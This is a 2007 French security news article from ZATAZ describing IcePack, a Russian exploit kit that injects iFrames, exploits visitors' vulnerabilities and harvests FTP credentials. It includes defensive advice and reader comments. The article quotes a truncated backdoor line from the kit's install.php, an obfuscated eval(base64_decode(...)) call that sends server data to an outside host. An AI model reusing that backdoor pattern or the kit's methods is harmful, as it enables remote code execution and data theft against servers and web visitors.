Actualité

 

IcePack: La boite à outils pirates

Publié le 19-08-2007 à 17:14:30 dans le thème Virus - Antivirus

Pays : International - Auteur : Damien Bancal


Pub : Logiciels de sécurité et de protection Internet


Note des lecteurs: 2.6/5

icepackDes pirates russes commercialisent un couteau Suisse du nom de IcePack.


Le moins que l'on puisse dire est que l'outil pirate surnommé IcePack a particulièrement bien été pensé par ses auteurs. Ces derniers signent sous le pseudonyme de IDT. Le premier août dernier, l'éditeur Panda Security classé ce "pack" comme très dangereux. La rédaction de zataz.com a mis la main sur la version Platinium de cette trousse à outils "made in russia".

IcePack est vendu par les pirates sous la forme d'un dossier de 2.35 Mo. Il comporte six dossiers comprenant 279 fichiers PHP et html. Le premier dossier est composé 11 pages php, un fichier dat et un ReadMe au format HTML. Ce document est le fichier d'information sur ce pack.
 
ice pack


IcePack est un outil de piratage servant à installer des malwares sur les ordinateurs en exploitant des vulnérabilités. IcePack permet d'accéder à des pages Web sur lesquelles il ajoute des références iFrame qui pointent vers un serveur sur lequel l'application est installée. L'originalité d'IcePack est que l'insertion de la référence iFrame est effectuée par la boute à outil elle même, comme le montre notre capture écran. Avec Mpack (VOIR) le pirate doit accéder manuellement aux pages web afin d'y insérer les iFrame. A noter que ces fichiers sont des versions évoluées de ceux trouvés dans les outils pirates Mpack. Trois dossiers sont proposés : Admin, Load et Exploits.
 


IcePack, késako ?
Une fois IcePack installé sur un serveur Internet, il faut mettre en place quelques broutilles Mysql, l'outil se lance sur un menu très propre, très clair.Icepack Pour y accéder, un login et un mot de passe sont demandé. Une fois le précieux sésame rentré, IcePack souhaite la bienvenue à l'utilisateur : "Soyez les bienvenus ! Pour se mettre au travail choisissez le point nécessaire dans le menu disposé dans la partie supérieure de l'écran." Un conseil, sortez votre dictionnaire franco-russe. A noter qu'une version anglaise existe, elle est, au moment de l'écriture de cet article, "private". L'outil n'est pas traduit mais est impressionnant de part ses possibilités de nuisance.

Lorsqu'un utilisateur visite une page infectée, l'iFrame active IcePack. Le piége se referme et IcePack va rechercher alors des vulnérabilités sur l'ordinateur. Une fois la faille découverte, la "création" d'IDT télécharge sur l'ordinateur visé un "exploit", un moyen d'exploiter la faille découverte auparavant. Une fois la machine cible "ouverte", Icepack permet de télécharger ce que souhaite le pirate, via une option ftp intégrée directement dans l'outil pirate. Parmi les autres possibilités proposés par ce logiciel vendu 500 dollars par IDT, et beaucoup moins cher par d'autres, exploitation des informations concernant les comptes FTP dérobés sur les ordinateurs infectés. icepackUn outil vérifié la validité des données volées. Il est aussi possible, comme pour les Mpack, de contrôler les ip des cibles, de choisir les failles selon les pays ciblés, ... Près de 200 sites web et accès FTP sont utilisés par IcePack. Des "aides" surtout basés en Russie et Estonie ainsi que quelques url stationnés à Taiwan et en Turquie.

Que faire face à ce genre "d'arme" numérique. Première évidence, mettre à jour son ordinateur, ses logiciels. IcePack travaille avec les failles du moment. Soyez donc réceptif aux mises à jour de vos outils et autres navigateurs. Mettez à jour votre antivirus. Si vous n'en possédez pas, car vous estimez que cela est trop coûteux, des solutions gratuites existent.

Vous pouvez effectuer une analyse de votre ordinateur avec des antivirus gratuits ou encore antivirus en ligne. Il existe aussi des firewall gratuits et des anti spaywares qui pourront vous permettre de contrôler les informations rentrantes et sortantes de votre machine.
 
Attention, danger !
Cet outil n'a rien de "fun". Il cache même en son sein une backdoor, une porte dérobée installée par les créateurs d'IcePack. Cette porte est cachées dans le fichier install.php "eval(base64_decode('ZmlsZV9nZXRfY29udGVud (...) http://datings.1gb.in/c.php?host=' . $_SERVER (...)" Autant dire que les utilisateurs de cette boite à outils risquent de se retrouver avec le double d'ennuis. (CB/ZATAZ)

 

Conseiller cet article Réagir RSS ZATAZ Digger cet article ! Partager cet article avec mes amis sur Facebook ! Partager cet article sur del.icio.us

Derniers contenus

L'espace d'authentification de Numéricâble dangereux

23-05-2013 à 14:53 - 0 commentaire(s)

Client de Numéricâble, prudence. L'espace d'authentification peut être piégé par un pirate informatique.

Fuite de données : la justice accuse les admins

23-05-2013 à 14:26 - 0 commentaire(s)

Si un administrateur d'un système informatique ne protège pas ses données, le "découvreur" ne risque plus d'être poursuivi pour piratage.

Skimmeur dans le Tarn

23-05-2013 à 12:30 - 0 commentaire(s)

Plusieurs dizaines de comptes bancaires piratés dans le Tarn. Un skimmeur a encore frappé.

Double authentification Twitter... ou pas

23-05-2013 à 09:39 - 0 commentaire(s)

Twitter annonce une sécurité renforcée via une double authentification. Et les autres failles ?

Danger via MySpace et DailyMotion

21-05-2013 à 09:47 - 0 commentaire(s)

Potentialités malveillantes à partir des sites communautaires MySpace et DailyMotion.

Un espace web Nestlé dangereux

21-05-2013 à 09:37 - 0 commentaire(s)

Un espace Nestlé, dédié aux bébés, propose des potentialités malveillantes aux pirates

Le site de George W. Bush dangereux

21-05-2013 à 08:28 - 0 commentaire(s)

Une faille sur le site Internet de l'ancien président américain, George W. Bush, permet de piéger les internautes.

Cyber attaque à coups de PDF malveillants

21-05-2013 à 08:19 - 0 commentaire(s)

Une cyber-attaque principalement orientée vers le Pakistan à travers de faux documents PDF attachés.

Sur le même thème : Virus - Antivirus

Cyber attaque à coups de PDF malveillants

Une cyber-attaque principalement orientée vers le Pakistan à travers de faux documents PDF attachés.

Fausse pub, fausse mise à jour Flash

Depuis quelques jours, une fausse mise à jour flash apparait dans de nombreux sites Internet. Explication !

Code malveillant dans le site Ministère du Travail U.S.

Le Ministère du Travail américain infiltré. Des traces de hackers Chinois retrouvés. Analyse !

Serveur Apache attaqués par un nouveau virus

Découverte d'une faille dans les serveurs Apache exploitée par un virus informatique de type worm.

XSS Worm : fonctionnement d'une arme numérique

XSS W0rm, quand le cross-site Scripting devient une arme incontrôlable.

Un pirate utilise l'attentat de Boston

Un pirate informatique profite de l'attentat de Boston pour espérer piéger des internautes.

Pot2Miel : le chasseur de malwares

Le site collaboratif Pot2Miel propose de chasser les malwares pour mieux protéger l'Internet des malveillants.

vSkimmer, le vilain venu de Russie

Depuis quelques semaines, un nouveau cheval de Troie, vSkimmer, attire les regards des chasseurs de pirates. Un dangereux vilain ?

Vos réactions ( 5 )

 Ecrit par Guest le 20.08.2007 à 05h58 

#

Invités


Inscrit le 26-05-2013

La version de IcePack Platinium que vous avez obtenue est une version leaked.
Les codeurs de IcePack n'ont JAMAIS introduit de backdoor dans leur pack, le leaker a pris soint de rajouté cette backdoor avant de diffusé le pack.


 Ecrit par Guest le 20.08.2007 à 17h47 

#

Invités


Inscrit le 26-05-2013

Bonjour,

Très certainement 'Z'. Mais en attendant, les internautes qui veulent télécharger ce genre d'outil et "jouer avec" se feront piéger.


 Ecrit par Guest le 20.08.2007 à 18h10 

#

Invités


Inscrit le 26-05-2013

Seconde backdoor découverte, lire brêve n'14774.


 Ecrit par Guest le 21.08.2007 à 05h33 

#

Invités


Inscrit le 26-05-2013

Quand on connait pas, on touche pas smile.gif.
De toute façon c'est bien connu, un tool leaked dont la source est libre (open sc ou langage script) dans les premiers temps sera 95% du temps backdooré (ya.bot, icepack, les premiers mpack smile.gif).
Après les gens qui jouent avec ça et qu'ils ne prévoient pas la backdoor c'est bien fait pour eux smile.gif


 Ecrit par 3L3CTROT3CK le 17.10.2009 à 04h43 

#

ZATAZien


Inscrit le 17-10-2009

hum interessant out sa


Réagir

Vous devez vous identifier pour ajouter un commentaire.

Cliquer ici pour vous inscrire.

 




Hacknowledge Contest Europa-Africa La Nuit du Hack Hacking In Progress La reference des emissions TV dediees a la cybersecurite Data Security Breach - Securite pour entreprise, pme, pmi Hack Contest Abidjan


Syndication RSS

nabaztag

  • http://www.wikio.fr
  • netvibes
  • NewsGator Online
  • Rojo
  • Bloglines
  • Google

ZATAZ mobile et PDA